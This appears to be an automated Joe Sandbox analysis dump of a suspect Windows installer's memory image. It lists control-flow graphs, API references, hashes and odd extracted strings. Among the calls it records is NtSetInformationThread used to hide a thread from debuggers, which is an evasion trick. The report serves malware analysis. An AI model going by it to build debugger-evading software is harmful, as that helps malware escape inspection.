6bfe3fae-6bfe3fcf 8068->8072 8073 6bfe407c-6bfe4081 8068->8073 8070 6bfe402c-6bfe403c 8069->8070 8071 6bfe3f06-6bfe3f35 8069->8071 8074 6bfe403e-6bfe4058 8070->8074 8075 6bfe40b3-6bfe40b8 8070->8075 8078 6bfe3f38-6bfe3f61 8071->8078 8076 6bfe40aa-6bfe40ae 8072->8076 8073->8076 8077 6bfe4083-6bfe408a 8073->8077 8080 6bfe405a-6bfe4063 8074->8080 8075->8072 8082 6bfe40be-6bfe40c9 8075->8082 8079 6bfe3f6b-6bfe3f6f 8076->8079 8077->8078 8081 6bfe4090 8077->8081 8083 6bfe3f64-6bfe3f67 8078->8083 8079->8064 8084 6bfe4069-6bfe406c 8080->8084 8085 6bfe40f5-6bfe413f 8080->8085 8081->8041 8082->8076 8086 6bfe40cb-6bfe40d4 8082->8086 8087 6bfe3f69 8083->8087 8088 6bfe4144-6bfe414b 8084->8088 8089 6bfe4072-6bfe4077 8084->8089 8085->8087 8090 6bfe40d6-6bfe40f0 8086->8090 8091 6bfe40a7 8086->8091 8087->8079 8088->8079 8089->8083 8090->8080 8091->8076
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CurrentThread
                                    • String ID:
                                    • API String ID: 2882836952-0
                                    • Opcode ID: b7cfd95dc1154b71cb938b90ae78242bcc05b5840560ccd0e68fabe537c2a036
                                    • Instruction ID: c9604fc6897afdf7bdbe46c8637480b4662e212e3722d213223872f2d822b2ee
                                    • Opcode Fuzzy Hash: b7cfd95dc1154b71cb938b90ae78242bcc05b5840560ccd0e68fabe537c2a036
                                    • Instruction Fuzzy Hash: 9151CF335047019FC332CF28C8847A5B7A3AF95314F698A5DC0EA1B6B5DB79B44B8B61
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CurrentThread
                                    • String ID:
                                    • API String ID: 2882836952-0
                                    • Opcode ID: 271b471a3c14063fc512384a8a29c7194ff3e5af7d4d133f6982d151ea6e6d70
                                    • Instruction ID: b59c0d057ff6b37ec720010d25405068f11b9223f1a0136345d3c4d06ecad970
                                    • Opcode Fuzzy Hash: 271b471a3c14063fc512384a8a29c7194ff3e5af7d4d133f6982d151ea6e6d70
                                    • Instruction Fuzzy Hash: 0F51E033504B119BC331CF28C4847A5B7A3BF85314F258A5DC0EA5B2B5DB78B44B8BA1
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 6BFE3E9D
                                    • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BFE3EAA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Thread$CurrentInformation
                                    • String ID:
                                    • API String ID: 1650627709-0
                                    • Opcode ID: c123e4544efe1767c5cfac96eb72f7bad0cd8d5e2a96775aa6256dae87de1170
                                    • Instruction ID: 81c8922bf57a2714f5d4e558802799448d54182b1ba8164c28ff6d0f136d3235
                                    • Opcode Fuzzy Hash: c123e4544efe1767c5cfac96eb72f7bad0cd8d5e2a96775aa6256dae87de1170
                                    • Instruction Fuzzy Hash: 18310233505B01DBC731CF28C8987E6B7A3AF96314F258A5DC0A65B2A1DB78700A8B61
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 6BFE3E9D
                                    • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BFE3EAA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Thread$CurrentInformation
                                    • String ID:
                                    • API String ID: 1650627709-0
                                    • Opcode ID: 7ad66dc5fa80b18c496fcab9393d63c9014312b1e51e2fced9a41d185e48fb27
                                    • Instruction ID: a686e870243011e7840370539b0e69f7bf59946148303842d761874f54b9b8de
                                    • Opcode Fuzzy Hash: 7ad66dc5fa80b18c496fcab9393d63c9014312b1e51e2fced9a41d185e48fb27
                                    • Instruction Fuzzy Hash: 98310133104701DBC735CF28C4987A6B7B2AF92304F254A5CC0EA5B2B5DB79B406CB61
                                    APIs
                                    • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C165130
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ManagerOpen
                                    • String ID:
                                    • API String ID: 1889721586-0
                                    • Opcode ID: 06e3c3c830669a9e0f74771e70f2b1e0fde329b5af76a10ef0d67d55d36fef8b
                                    • Instruction ID: b8cd50b2160f0b8e29c9baf2b097b9fc7df034c3abedfd6a5c9c9bbd39c8adc7
                                    • Opcode Fuzzy Hash: 06e3c3c830669a9e0f74771e70f2b1e0fde329b5af76a10ef0d67d55d36fef8b
                                    • Instruction Fuzzy Hash: 563147B4609301EFC710CF2AC584A0ABBF0AB8A758F51895EF888C7761C371C858DB62
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 6BFE3E9D
                                    • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BFE3EAA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Thread$CurrentInformation
                                    • String ID:
                                    • API String ID: 1650627709-0
                                    • Opcode ID: dfddc45d17862a06b9b93c5a09c521e72dee76ea844a0b42f0c8da1f83b272bd
                                    • Instruction ID: f394b5665d31b664a4e9126f4279f64626a908d8608ad03c4fdba2712583f1d6
                                    • Opcode Fuzzy Hash: dfddc45d17862a06b9b93c5a09c521e72dee76ea844a0b42f0c8da1f83b272bd
                                    • Instruction Fuzzy Hash: 91210533518701EBD735CF24C8987AAB7B2AF42304F244A5DD0A64B2B0DB78B4068B71
                                    APIs
                                    • FindFirstFileA.KERNEL32(?,?), ref: 6C15AEDC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: FileFindFirst
                                    • String ID:
                                    • API String ID: 1974802433-0
                                    • Opcode ID: 463a5cb9b15cfdcd59f737340673275f6f910cdfeeee14818fd42bc97e61b7a5
                                    • Instruction ID: ab6393252595d1d3687c6eb21e44c9eb29dea926f6f636b3180ae703e7f9b6f6
                                    • Opcode Fuzzy Hash: 463a5cb9b15cfdcd59f737340673275f6f910cdfeeee14818fd42bc97e61b7a5
                                    • Instruction Fuzzy Hash: 861136B4548350AFD710CB28D94452EBBE4BF86314F948E9AF4B8CB691D335CC948B72
                                    APIs
                                    • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C13ABA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                    • API String ID: 2738559852-1563143607
                                    • Opcode ID: b0f16579b11d8e6e7da52a181cd9e4e64cd9789ba1fd1c69f4ac809145028102
                                    • Instruction ID: 6f37787a94fd6a45db14fb83d1f557e4a9daae63c680c0d9eb62942993df4b16
                                    • Opcode Fuzzy Hash: b0f16579b11d8e6e7da52a181cd9e4e64cd9789ba1fd1c69f4ac809145028102
                                    • Instruction Fuzzy Hash: F262797060D7918FCB24CF58C490A5ABBE2AFDA308F249D1EE899CB755D734D8468B43

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 6824 6c17cad3-6c17cae3 6825 6c17cae5-6c17caf8 call 6c16f9df call 6c16f9cc 6824->6825 6826 6c17cafd-6c17caff 6824->6826 6844 6c17ce7c 6825->6844 6828 6c17cb05-6c17cb0b 6826->6828 6829 6c17ce64-6c17ce71 call 6c16f9df call 6c16f9cc 6826->6829 6828->6829 6830 6c17cb11-6c17cb37 6828->6830 6845 6c17ce77 call 6c170120 6829->6845 6830->6829 6833 6c17cb3d-6c17cb46 6830->6833 6836 6c17cb60-6c17cb62 6833->6836 6837 6c17cb48-6c17cb5b call 6c16f9df call 6c16f9cc 6833->6837 6842 6c17ce60-6c17ce62 6836->6842 6843 6c17cb68-6c17cb6b 6836->6843 6837->6845 6847 6c17ce7f-6c17ce82 6842->6847 6843->6842 6848 6c17cb71-6c17cb75 6843->6848 6844->6847 6845->6844 6848->6837 6851 6c17cb77-6c17cb8e 6848->6851 6853 6c17cb90-6c17cb93 6851->6853 6854 6c17cbdf-6c17cbe5 6851->6854 6857 6c17cb95-6c17cb9e 6853->6857 6858 6c17cba3-6c17cba9 6853->6858 6855 6c17cbe7-6c17cbf1 6854->6855 6856 6c17cbab-6c17cbc2 call 6c16f9df call 6c16f9cc call 6c170120 6854->6856 6859 6c17cbf3-6c17cbf5 6855->6859 6860 6c17cbf8-6c17cc16 call 6c1747f5 call 6c1747bb * 2 6855->6860 6888 6c17cd97 6856->6888 6861 6c17cc63-6c17cc73 6857->6861 6858->6856 6862 6c17cbc7-6c17cbda 6858->6862 6859->6860 6892 6c17cc33-6c17cc5c call 6c17ac69 6860->6892 6893 6c17cc18-6c17cc2e call 6c16f9cc call 6c16f9df 6860->6893 6865 6c17cc79-6c17cc85 6861->6865 6866 6c17cd38-6c17cd41 call 6c1819e5 6861->6866 6862->6861 6865->6866 6870 6c17cc8b-6c17cc8d 6865->6870 6877 6c17cdb4 6866->6877 6878 6c17cd43-6c17cd55 6866->6878 6870->6866 6874 6c17cc93-6c17ccb7 6870->6874 6874->6866 6879 6c17ccb9-6c17cccf 6874->6879 6881 6c17cdb8-6c17cdd0 ReadFile 6877->6881 6878->6877 6883 6c17cd57-6c17cd66 GetConsoleMode 6878->6883 6879->6866 6884 6c17ccd1-6c17ccd3 6879->6884 6886 6c17cdd2-6c17cdd8 6881->6886 6887 6c17ce2c-6c17ce37 GetLastError 6881->6887 6883->6877 6889 6c17cd68-6c17cd6c 6883->6889 6884->6866 6890 6c17ccd5-6c17ccfb 6884->6890 6886->6887 6896 6c17cdda 6886->6896 6894 6c17ce50-6c17ce53 6887->6894 6895 6c17ce39-6c17ce4b call 6c16f9cc call 6c16f9df 6887->6895 6898 6c17cd9a-6c17cda4 call 6c1747bb 6888->6898 6889->6881 6897 6c17cd6e-6c17cd88 ReadConsoleW 6889->6897 6890->6866 6899 6c17ccfd-6c17cd13 6890->6899 6892->6861 6893->6888 6907 6c17cd90-6c17cd96 call 6c16f9f2 6894->6907 6908 6c17ce59-6c17ce5b 6894->6908 6895->6888 6904 6c17cddd-6c17cdef 6896->6904 6905 6c17cd8a GetLastError 6897->6905 6906 6c17cda9-6c17cdb2 6897->6906 6898->6847 6899->6866 6900 6c17cd15-6c17cd17 6899->6900 6900->6866 6911 6c17cd19-6c17cd33 6900->6911 6904->6898 6915 6c17cdf1-6c17cdf5 6904->6915 6905->6907 6906->6904 6907->6888 6908->6898 6911->6866 6919 6c17cdf7-6c17ce07 call 6c17cefe 6915->6919 6920 6c17ce0e-6c17ce19 6915->6920 6931 6c17ce0a-6c17ce0c 6919->6931 6925 6c17ce25-6c17ce2a call 6c17d1b6 6920->6925 6926 6c17ce1b call 6c17ce83 6920->6926 6932 6c17ce20-6c17ce23 6925->6932 6926->6932 6931->6898 6932->6931
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8Q
                                    • API String ID: 0-4022487301
                                    • Opcode ID: ad06768193181b6588c8723a2c7609cb5523d63603c69ea9183430f9d822092c
                                    • Instruction ID: 7516ee41ff6cd33fefac4113cad4d18464ab88826efe22c08df67ccef96e0ca0
                                    • Opcode Fuzzy Hash: ad06768193181b6588c8723a2c7609cb5523d63603c69ea9183430f9d822092c
                                    • Instruction Fuzzy Hash: A8C10670E04249AFDF11DFA9C8A0BEDBFB1AF4A318F204159E950ABB81C7759945CB70

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 6933 6c18406c-6c18409c call 6c1844ec 6936 6c18409e-6c1840a9 call 6c16f9df 6933->6936 6937 6c1840b7-6c1840c3 call 6c18160c 6933->6937 6944 6c1840ab-6c1840b2 call 6c16f9cc 6936->6944 6942 6c1840dc-6c184125 call 6c184457 6937->6942 6943 6c1840c5-6c1840da call 6c16f9df call 6c16f9cc 6937->6943 6953 6c184192-6c18419b GetFileType 6942->6953 6954 6c184127-6c184130 6942->6954 6943->6944 6951 6c184391-6c184395 6944->6951 6955 6c18419d-6c1841ce GetLastError call 6c16f9f2 CloseHandle 6953->6955 6956 6c1841e4-6c1841e7 6953->6956 6958 6c184132-6c184136 6954->6958 6959 6c184167-6c18418d GetLastError call 6c16f9f2 6954->6959 6955->6944 6970 6c1841d4-6c1841df call 6c16f9cc 6955->6970 6962 6c1841e9-6c1841ee 6956->6962 6963 6c1841f0-6c1841f6 6956->6963 6958->6959 6964 6c184138-6c184165 call 6c184457 6958->6964 6959->6944 6967 6c1841fa-6c184248 call 6c1817b0 6962->6967 6963->6967 6968 6c1841f8 6963->6968 6964->6953 6964->6959 6975 6c18424a-6c184256 call 6c184666 6967->6975 6976 6c184267-6c18428f call 6c184710 6967->6976 6968->6967 6970->6944 6975->6976 6982 6c184258 6975->6982 6983 6c184291-6c184292 6976->6983 6984 6c184294-6c1842d5 6976->6984 6985 6c18425a-6c184262 call 6c17b925 6982->6985 6983->6985 6986 6c1842f6-6c184304 6984->6986 6987 6c1842d7-6c1842db 6984->6987 6985->6951 6988 6c18430a-6c18430e 6986->6988 6989 6c18438f 6986->6989 6987->6986 6991 6c1842dd-6c1842f1 6987->6991 6988->6989 6992 6c184310-6c184343 CloseHandle call 6c184457 6988->6992 6989->6951 6991->6986 6996 6c184345-6c184371 GetLastError call 6c16f9f2 call 6c18171f 6992->6996 6997 6c184377-6c18438b 6992->6997 6996->6997 6997->6989
                                    APIs
                                      • Part of subcall function 6C184457: CreateFileW.KERNEL32(00000000,00000000,?,6C184115,?,?,00000000,?,6C184115,00000000,0000000C), ref: 6C184474
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C184180
                                    • __dosmaperr.LIBCMT ref: 6C184187
                                    • GetFileType.KERNEL32(00000000), ref: 6C184193
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C18419D
                                    • __dosmaperr.LIBCMT ref: 6C1841A6
                                    • CloseHandle.KERNEL32(00000000), ref: 6C1841C6
                                    • CloseHandle.KERNEL32(6C17B0D0), ref: 6C184313
                                    • GetLastError.KERNEL32 ref: 6C184345
                                    • __dosmaperr.LIBCMT ref: 6C18434C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: 8Q
                                    • API String ID: 4237864984-4022487301
                                    • Opcode ID: 49d1ca81cc0b727ece7ab65a91d9e0e20da067ca9cfe96d86b511335d5bd3c71
                                    • Instruction ID: 0a0251a1d07ed42bc018902475f0689b48f8d0381f4d3a1232da2d04ad20015b
                                    • Opcode Fuzzy Hash: 49d1ca81cc0b727ece7ab65a91d9e0e20da067ca9cfe96d86b511335d5bd3c71
                                    • Instruction Fuzzy Hash: 2BA14932A091549FCF09CF68C8A17EE7BB5AB07328F244259E821EF7C1CB359816CB51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7002 6c13c1e0-6c13c239 call 6c166b70 7005 6c13c260-6c13c269 7002->7005 7006 6c13c2b0-6c13c2b5 7005->7006 7007 6c13c26b-6c13c270 7005->7007 7008 6c13c330-6c13c335 7006->7008 7009 6c13c2b7-6c13c2bc 7006->7009 7010 6c13c272-6c13c277 7007->7010 7011 6c13c2f0-6c13c2f5 7007->7011 7016 6c13c33b-6c13c340 7008->7016 7017 6c13c489-6c13c4b9 call 6c16b3a0 7008->7017 7012 6c13c2c2-6c13c2c7 7009->7012 7013 6c13c407-6c13c41b 7009->7013 7018 6c13c372-6c13c3df WriteFile 7010->7018 7019 6c13c27d-6c13c282 7010->7019 7014 6c13c431-6c13c448 WriteFile 7011->7014 7015 6c13c2fb-6c13c300 7011->7015 7023 6c13c23b-6c13c250 7012->7023 7024 6c13c2cd-6c13c2d2 7012->7024 7022 6c13c41f-6c13c42c 7013->7022 7025 6c13c452-6c13c47f call 6c16b920 ReadFile 7014->7025 7015->7025 7026 6c13c306-6c13c30b 7015->7026 7028 6c13c346-6c13c36d 7016->7028 7029 6c13c4be-6c13c4c3 7016->7029 7017->7005 7020 6c13c3e9-6c13c3fd WriteFile 7018->7020 7019->7020 7021 6c13c288-6c13c28d 7019->7021 7020->7013 7021->7005 7030 6c13c28f-6c13c2aa 7021->7030 7022->7005 7034 6c13c253-6c13c258 7023->7034 7024->7005 7031 6c13c2d4-6c13c2e7 7024->7031 7025->7017 7026->7005 7033 6c13c311-6c13c32b 7026->7033 7028->7034 7029->7005 7036 6c13c4c9-6c13c4d7 7029->7036 7030->7034 7031->7034 7033->7022 7034->7005
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :uW$;uW$;uW$> 4!$> 4!
                                    • API String ID: 0-4100612575
                                    • Opcode ID: 7cc9b1f253ee2e4e6a4548a3b501d27e2c616b9bf371c6a37fe57e3469c6404d
                                    • Instruction ID: e8cf6f4e28ee1adf9f8b31180e0bef021ee0df68075777cd0808048b8075677a
                                    • Opcode Fuzzy Hash: 7cc9b1f253ee2e4e6a4548a3b501d27e2c616b9bf371c6a37fe57e3469c6404d
                                    • Instruction Fuzzy Hash: 5F71BDB0208365EFC710DF55C890B6ABBF4FF8A708F104A2EF488D6650D3B5D8588B96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: K?Jo$K?Jo$`Rlx$7eO
                                    • API String ID: 0-174837320
                                    • Opcode ID: 986b23844f3d8206fb606f26c4c05519f586eb94315e480fea59ce24723491c6
                                    • Instruction ID: 548aafe359a4b5cd5304b0fbd78267707936163d2420c18fdad2d9d15673df50
                                    • Opcode Fuzzy Hash: 986b23844f3d8206fb606f26c4c05519f586eb94315e480fea59ce24723491c6
                                    • Instruction Fuzzy Hash: 324297B86097518FD754CF18C090A1ABBF1EFD9358F20AE1EE59987B60E638D844CB43
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
